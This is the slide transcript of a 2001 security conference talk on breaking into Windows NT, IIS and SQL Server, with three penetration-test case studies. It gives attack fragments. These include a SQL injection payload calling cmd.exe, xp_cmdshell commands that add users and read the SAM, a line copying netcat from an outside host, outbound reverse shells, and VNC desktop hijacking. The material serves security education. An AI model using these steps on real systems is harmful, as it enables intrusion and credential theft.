CanSecWest 2001

1
CanSecWest 2001

• H D Moore
• Digital Defense Inc.
• Working With You To Secure Your Networks

2
Introduction

• Background Information
• Why bother with NT?
• Internet Information Server
• Microsoft SQL Server
• Three Case Studies

3
Background

• Myself
• Experience
• Projects
• Digital Defense
• Our Services
• Our Clients

4
Why bother with NT?

• Over 20 of Internet web sites run on NT
• Popular platform in the financial industry
• Very difficult to make secure
• Relatively simple to exploit

5
IIS - Overview

• What is IIS?
• Easy to use, easy to hack
• Default install is massively vulnerable
• Sample scripts provide multiple points of entry
• Default extensions have a number of problems
• Unicode bug allows easy command execution
• Remote Data Services

6
IIS Sample Files

• Samples are installed by default.
• Service packs and patches leave samples.
• Examples
• /iisadmpwd/aexp4b.htr
• /msadc/samples/adctest.asp
• Showcode.asp

7
IIS Extensions

• Service packs leave extensions mapped
• .ida/.idq/.idc Path Disclosure
• .htr/.htw View File Source
• Importance of Global.asa

8
IIS UNICODE

• What is UNICODE?
• 63 ways to write the letter A
• The directory transversal bug
• Command execution as the IUSR account
• Application directory transversal
• Unicoder.pl

9
IIS RDS

• What is RDS?
• MDAC 1.5 allows embedded VBA code
• Upgrading to 2.x doesnt restrict access
• SQL Relaying Attacks
• RDS over RDS
• Port scanning via RDS
• Sqlrds.pl

10
(No Transcript)
11
IIS Summary

• The sheer number of problems an out of the box
  installation has almost guarantees that you will
  be able to gain access
• Microsofts attempt to make IIS as versatile and
  easy to use as possible also created many
  security problems
• IIS has a long history of security bugs and it
  doesnt look like its getting any better

12
IIS Questions

• ?

13
Microsoft SQL Server

• Based on Sybase engine
• Default accounts are the biggest problem
• Vendor software automatically installs server
• Most SQL user restrictions can be bypassed
• Extended Stored Procedures allow everything from
  command execution to e-mailing query results

14
SQL Default Accounts

• The default sa account
• The probe account in MS-SQL 6.5
• Using an unprivileged account to gain access to
  other servers and accounts via OLE.
• Microsofts samples all use the sa account with
  no password.

15
SQL Ext. Procedures

• The classic xp_cmdshell
• Reading the SAM with xp_regread
• Listing DSNs with xp_enumdsn
• Remote output with sp_makewebtask
• Accessible NetBIOS share
• sp_makewebtask \\ip\share\out.html, select
  

16
SQL Exploitation

• Finding servers
• osql L
• SQLPing (www.sqlsecurity.com/faq.html)
• Logging in
• Default sa and probe accounts
• Finding passwords stored in ASP
• Getting Access
• Xp_cmdshell net user /ADD
• Xp_regread HKLM/Security/SAM

17
SQL Summary

• The features that Microsoft added to the base
  Sybase engine make it much more hacker friendly
• Multiple access methods and information
  divulgence make finding and connecting to the
  server relatively easy
• Lack of security documentation in conjunction
  with Microsofts sample code ensures the problem
  is only going to get worse

18
SQL Questions

• ?

19
Case Study MDAC 1.5

• All samples were removed
• System was running the latest patches
• ASP based employee directory
• Single quote in the name field produced an ODBC
  error
• ODBC error message contained table and column
  names, which I used to rewrite the SQL query

20
Case Study MDAC 1.5

• SELECT from TBL where ID field
• field BOGUS OR ID shell(cmd.exe /c )
• SELECT from TBL where ID BOGUS OR ID
  shell(cmd.exe /c )
• Executed rdisk /s- to rebuild SAM file
• Copied sam._ to web root directory and cracked it
• copy \\www.desktopgirls.com\share\nc.exe c\
• Launched an outgoing netcat command shell to port
  80
• Used Admin password to gain access to rest of
  network

21
Case Study SQL RDS

• IIS 3.0 with samples removed
• Not vulnerable to Unicode
• Msadcs.dll (RDS) was available, but had been
  upgraded to 2.5
• Created a Perl script which used RDS to relay a
  SQL connection to localhost, using the default
  sa account with no password

22
Case Study SQL RDS

• Called the xp_cmdshell stored procedure to
  rebuild the SAM and copy it over to the web root
  directory
• Executed netcat to send an outbound command shell
• Used Admin password to access the rest of the
  network

23
Case Study VNC

• IIS 4.0 with no samples
• Unicode vulnerability
• Port 1300 allowed through firewall
• Used the Unicode vulnerability to create the
  upload.asp script
• Uploaded the cmdasp.asp script, which provides
  SYSTEM access under IIS 4.0

24
Case Study VNC

• VNC display set to 4600 or 60395
• Uploaded the VNC server, reg.exe, the registry
  file, and dlls through upload.asp
• Imported registry and installed WinVNC
• Started VNC service and connected to port 1300
• Hijacked the desktop of the current user

25
Case Studies

• Questions?

26
(No Transcript)
27
Conclusion

• Resources
• http//www.digitaloffense.net/csw/
• http//www.wiretrip.net/rfp
• http//www.sqlsecurity.com/
• hdmoore_at_digitaldefense.net